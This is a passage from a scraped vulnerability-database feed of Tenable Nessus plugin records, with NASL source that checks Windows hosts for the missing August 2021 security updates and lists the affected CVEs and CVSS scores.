script_xref(name:\"IAVA\", value:\"2021-A-0373-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0374-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/21\");\n\n script_name(english:\"KB5005106: Windows Server 2012 R2 Security Update (August 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5005106\nor cumulative update 5005076. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-26425, CVE-2021-26426, CVE-2021-34483,\n CVE-2021-34484, CVE-2021-34537, CVE-2021-36927)\n\n - A session spoofing vulnerability exists. An attacker can\n exploit this to perform actions with the privileges of\n another user. (CVE-2021-36942)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-26424,\n CVE-2021-26432, CVE-2021-34533, CVE-2021-34535,\n CVE-2021-36936, CVE-2021-36937, CVE-2021-36947)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2021-26433, CVE-2021-36926,\n CVE-2021-36932, CVE-2021-36933)\n\n - An memory corruption vulnerability exists. An attacker\n can exploit this to corrupt the memory and cause\n unexpected behaviors within the system/application.\n (CVE-2021-34480)\");\n # https://support.microsoft.com/en-us/topic/kb5005036-cumulative-security-update-for-internet-explorer-august-10-2021-621b1edb-b461-4d99-ae3e-5add55e53895\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?0fe73cef\");\n # https://support.microsoft.com/en-us/topic/august-10-2021-kb5005076-monthly-rollup-bf677fed-96d9-475e-87c1-a053fa75fef7\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?0e0382f6\");\n # https://support.microsoft.com/en-us/topic/august-10-2021-kb5005106-security-only-update-d1ab5a34-55c1-4f66-8776-54a0c3bf40a7\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?57da6a50\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB5005106 or Cumulative Update KB5005076.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-36936\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/08/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/08/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/08/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-08';\nkbs = make_list(\n '5005106',\n '5005076'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win81:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'6.3', \n sp:0,\n rollup_date:'08_2021',\n bulletin:bulletin,\n rollup_kb_list:[5005106, 5005076])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-19T15:13:14", "description": "The remote Windows host is missing security update 5005031.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2021-26424, CVE-2021-26432, CVE-2021-34530, CVE-2021-34533, CVE-2021-34534, CVE-2021-34535, CVE-2021-36936, CVE-2021-36937, CVE-2021-36947)\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2021-26425, CVE-2021-26426, CVE-2021-34483, CVE-2021-34484, CVE-2021-34486, CVE-2021-34487, CVE-2021-34536, CVE-2021-34537, CVE-2021-36948)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2021-26433, CVE-2021-36926, CVE-2021-36932, CVE-2021-36933)\n\n - An memory corruption vulnerability exists. An attacker can exploit this to corrupt the memory and cause unexpected behaviors within the system/application.\n (CVE-2021-34480)", "cvss3": {}, "published": "2021-08-10T00:00:00", "type": "nessus", "title": "KB5005031: Windows 10 Version 1909 Security Update (August 2021)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-26424", "CVE-2021-26425", "CVE-2021-26426", "CVE-2021-26432", "CVE-2021-26433", "CVE-2021-34480", "CVE-2021-34481", "CVE-2021-34483", "CVE-2021-34484", "CVE-2021-34486", "CVE-2021-34487", "CVE-2021-34530", "CVE-2021-34533", "CVE-2021-34534", "CVE-2021-34535", "CVE-2021-34536", "CVE-2021-34537", "CVE-2021-36926", "CVE-2021-36932", "CVE-2021-36933", "CVE-2021-36936", "CVE-2021-36937", "CVE-2021-36947", "CVE-2021-36948"], "modified": "2022-04-07T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_AUG_5005031.NASL", "href": "https://www.tenable.com/plugins/nessus/152430", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(152430);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/07\");\n\n script_cve_id(\n \"CVE-2021-26424\",\n \"CVE-2021-26425\",\n \"CVE-2021-26426\",\n \"CVE-2021-26432\",\n \"CVE-2021-26433\",\n \"CVE-2021-34480\",\n \"CVE-2021-34481\",\n \"CVE-2021-34483\",\n \"CVE-2021-34484\",\n \"CVE-2021-34486\",\n \"CVE-2021-34487\",\n \"CVE-2021-34530\",\n \"CVE-2021-34533\",\n \"CVE-2021-34534\",\n \"CVE-2021-34535\",\n \"CVE-2021-34536\",\n \"CVE-2021-34537\",\n \"CVE-2021-36926\",\n \"CVE-2021-36932\",\n \"CVE-2021-36933\",\n \"CVE-2021-36936\",\n \"CVE-2021-36937\",\n \"CVE-2021-36947\",\n \"CVE-2021-36948\"\n );\n script_xref(name:\"MSKB\", value:\"5005031\");\n script_xref(name:\"MSFT\", value:\"MS21-5005031\");\n script_xref(name:\"IAVA\", value:\"2021-A-0373-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0374-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/18\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/21\");\n\n script_name(english:\"KB5005031: Windows 10 Version 1909 Security Update (August 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5005031.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-26424,\n CVE-2021-26432, CVE-2021-34530, CVE-2021-34533,\n CVE-2021-34534, CVE-2021-34535, CVE-2021-36936,\n CVE-2021-36937, CVE-2021-36947)\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-26425, CVE-2021-26426, CVE-2021-34483,\n CVE-2021-34484, CVE-2021-34486, CVE-2021-34487,\n CVE-2021-34536, CVE-2021-34537, CVE-2021-36948)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2021-26433, CVE-2021-36926,\n CVE-2021-36932, CVE-2021-36933)\n\n - An memory corruption vulnerability exists. An attacker\n can exploit this to corrupt the memory and cause\n unexpected behaviors within the system/application.\n (CVE-2021-34480)\");\n # https://support.microsoft.com/en-us/topic/august-10-2021-kb5005031-os-build-18363-1734-8af726da-a39b-417d-a5fb-670c42d69e78\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?819616f3\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB5005031.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-36936\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/08/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/08/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/08/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-08';\nkbs = make_list(\n '5005031'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10', \n sp:0,\n os_build:18363,\n rollup_date:'08_2021',\n bulletin:bulletin,\n rollup_kb_list:[5005031])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:32:50", "description": "The remote Windows host is missing security update 5005043.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2021-26424, CVE-2021-26432, CVE-2021-34530, CVE-2021-34533, CVE-2021-34534, CVE-2021-34535, CVE-2021-36936, CVE-2021-36937, CVE-2021-36947)\n\n - A session spoofing vulnerability exists. An attacker can exploit this to perform actions with the privileges of another user. (CVE-2021-36942)\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2021-26425, CVE-2021-26426, CVE-2021-34483, CVE-2021-34484, CVE-2021-34487, CVE-2021-34536, CVE-2021-34537)\n\n - An memory corruption vulnerability exists. An attacker can exploit this to corrupt the memory and cause unexpected behaviors within the system/application.\n (CVE-2021-34480)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2021-26433, CVE-2021-36926, CVE-2021-36932, CVE-2021-36933, CVE-2021-36938)", "cvss3": {}, "published": "2021-08-10T00:00:00", "type": "nessus", "title": "KB5005043: Windows 10 Version 1607 and Windows Server 2016 Security Update (August 2021)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-26424", "CVE-2021-26425", "CVE-2021-26426", "CVE-2021-26432", "CVE-2021-26433", "CVE-2021-34480", "CVE-2021-34481", "CVE-2021-34483", "CVE-2021-34484", "CVE-2021-34487", "CVE-2021-34530", "CVE-2021-34533", "CVE-2021-34534", "CVE-2021-34535", "CVE-2021-34536", "CVE-2021-34537", "CVE-2021-36926", "CVE-2021-36932", "CVE-2021-36933", "CVE-2021-36936", "CVE-2021-36937", "CVE-2021-36938", "CVE-2021-36942", "CVE-2021-36947"], "modified": "2022-04-07T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_AUG_5005043.NASL", "href": "https://www.tenable.com/plugins/nessus/152434", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(152434);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/07\");\n\n script_cve_id(\n \"CVE-2021-26424\",\n \"CVE-2021-26425\",\n \"CVE-2021-26426\",\n \"CVE-2021-26432\",\n \"CVE-2021-26433\",\n \"CVE-2021-34480\",\n \"CVE-2021-34481\",\n \"CVE-2021-34483\",\n \"CVE-2021-34484\",\n \"CVE-2021-34487\",\n \"CVE-2021-34530\",\n \"CVE-2021-34533\",\n \"CVE-2021-34534\",\n \"CVE-2021-34535\",\n \"CVE-2021-34536\",\n \"CVE-2021-34537\",\n \"CVE-2021-36926\",\n \"CVE-2021-36932\",\n \"CVE-2021-36933\",\n \"CVE-2021-36936\",\n \"CVE-2021-36937\",\n \"CVE-2021-36938\",\n \"CVE-2021-36942\",\n \"CVE-2021-36947\"\n );\n script_xref(name:\"MSKB\", value:\"5005043\");\n script_xref(name:\"MSFT\", value:\"MS21-5005043\");\n script_xref(name:\"IAVA\", value:\"2021-A-0373-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0374-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/21\");\n\n script_name(english:\"KB5005043: Windows 10 Version 1607 and Windows Server 2016 Security Update (August 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5005043.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-26424,\n CVE-2021-26432, CVE-2021-34530, CVE-2021-34533,\n CVE-2021-34534, CVE-2021-34535, CVE-2021-36936,\n CVE-2021-36937, CVE-2021-36947)\n\n - A session spoofing vulnerability exists. An attacker can\n exploit this to perform actions with the privileges of\n another user. (CVE-2021-36942)\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-26425, CVE-2021-26426, CVE-2021-34483,\n CVE-2021-34484, CVE-2021-34487, CVE-2021-34536,\n CVE-2021-34537)\n\n - An memory corruption vulnerability exists. An attacker\n can exploit this to corrupt the memory and cause\n unexpected behaviors within the system/application.\n (CVE-2021-34480)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2021-26433, CVE-2021-36926,\n CVE-2021-36932, CVE-2021-36933, CVE-2021-36938)\");\n # https://support.microsoft.com/en-us/topic/august-10-2021-kb5005043-os-build-14393-4583-709d481e-b02a-4eb9-80d9-75c4b8170240\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?e5193663\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB5005043.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-36936\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/08/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/08/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/08/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-08';\nkbs = make_list(\n '5005043'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10', \n sp:0,\n os_build:14393,\n rollup_date:'08_2021',\n bulletin:bulletin,\n rollup_kb_list:[5005043])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-19T15:13:14", "description": "The remote Windows host is missing security update 5005030.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2021-26424, CVE-2021-26432, CVE-2021-34530, CVE-2021-34533, CVE-2021-34534, CVE-2021-34535, CVE-2021-36936, CVE-2021-36937, CVE-2021-36947)\n\n - A session spoofing vulnerability exists. An attacker can exploit this to perform actions with the privileges of another user. (CVE-2021-36942)\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2021-26425, CVE-2021-26426, CVE-2021-34483, CVE-2021-34484, CVE-2021-34486, CVE-2021-34487, CVE-2021-34536, CVE-2021-34537, CVE-2021-36948)\n\n - An memory corruption vulnerability exists. An attacker can exploit this to corrupt the memory and cause unexpected behaviors within the system/application.\n (CVE-2021-34480)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2021-26433, CVE-2021-36926, CVE-2021-36932, CVE-2021-36933, CVE-2021-36938)", "cvss3": {}, "published": "2021-08-10T00:00:00", "type": "nessus", "title": "KB5005030: Windows 10 Version 1809 and Windows Server 2019 Security Update (August 2021)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-26424", "CVE-2021-26425", "CVE-2021-26426", "CVE-2021-26432", "CVE-2021-26433", "CVE-2021-34480", "CVE-2021-34481", "CVE-2021-34483", "CVE-2021-34484", "CVE-2021-34486", "CVE-2021-34487", "CVE-2021-34530", "CVE-2021-34533", "CVE-2021-34534", "CVE-2021-34535", "CVE-2021-34536", "CVE-2021-34537", "CVE-2021-36926", "CVE-2021-36932", "CVE-2021-36933", "CVE-2021-36936", "CVE-2021-36937", "CVE-2021-36938", "CVE-2021-36942", "CVE-2021-36947", "CVE-2021-36948"], "modified": "2022-04-07T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_AUG_5005030.NASL", "href": "https://www.tenable.com/plugins/nessus/152435", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(152435);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/07\");\n\n script_cve_id(\n \"CVE-2021-26424\",\n \"CVE-2021-26425\",\n \"CVE-2021-26426\",\n \"CVE-2021-26432\",\n \"CVE-2021-26433\",\n \"CVE-2021-34480\",\n \"CVE-2021-34481\",\n \"CVE-2021-34483\",\n \"CVE-2021-34484\",\n \"CVE-2021-34486\",\n \"CVE-2021-34487\",\n \"CVE-2021-34530\",\n \"CVE-2021-34533\",\n \"CVE-2021-34534\",\n \"CVE-2021-34535\",\n \"CVE-2021-34536\",\n \"CVE-2021-34537\",\n \"CVE-2021-36926\",\n \"CVE-2021-36932\",\n \"CVE-2021-36933\",\n \"CVE-2021-36936\",\n \"CVE-2021-36937\",\n \"CVE-2021-36938\",\n \"CVE-2021-36942\",\n \"CVE-2021-36947\",\n \"CVE-2021-36948\"\n );\n script_xref(name:\"MSKB\", value:\"5005030\");\n script_xref(name:\"MSFT\", value:\"MS21-5005030\");\n script_xref(name:\"IAVA\", value:\"2021-A-0373-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0374-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/18\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/21\");\n\n script_name(english:\"KB5005030: Windows 10 Version 1809 and Windows Server 2019 Security Update (August 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5005030.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-26424,\n CVE-2021-26432, CVE-2021-34530, CVE-2021-34533,\n CVE-2021-34534, CVE-2021-34535, CVE-2021-36936,\n CVE-2021-36937, CVE-2021-36947)\n\n - A session spoofing vulnerability exists. An attacker can\n exploit this to perform actions with the privileges of\n another user. (CVE-2021-36942)\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-26425, CVE-2021-26426, CVE-2021-34483,\n CVE-2021-34484, CVE-2021-34486, CVE-2021-34487,\n CVE-2021-34536, CVE-2021-34537, CVE-2021-36948)\n\n - An memory corruption vulnerability exists. An attacker\n can exploit this to corrupt the memory and cause\n unexpected behaviors within the system/application.\n (CVE-2021-34480)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2021-26433, CVE-2021-36926,\n CVE-2021-36932, CVE-2021-36933, CVE-2021-36938)\");\n # https://support.microsoft.com/en-us/topic/august-10-2021-kb5005030-os-build-17763-2114-cec503ed-cc09-4641-bdc1-988153e0bd9a\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?34b43ea5\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB5005030.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-36936\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/08/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/08/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/08/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-08';\nkbs = make_list(\n '5005030'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10', \n sp:0,\n os_build:17763,\n rollup_date:'08_2021',\n bulletin:bulletin,\n rollup_kb_list:[5005030])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:01:53", "description": "The remote Windows host is missing security update 4561645 or 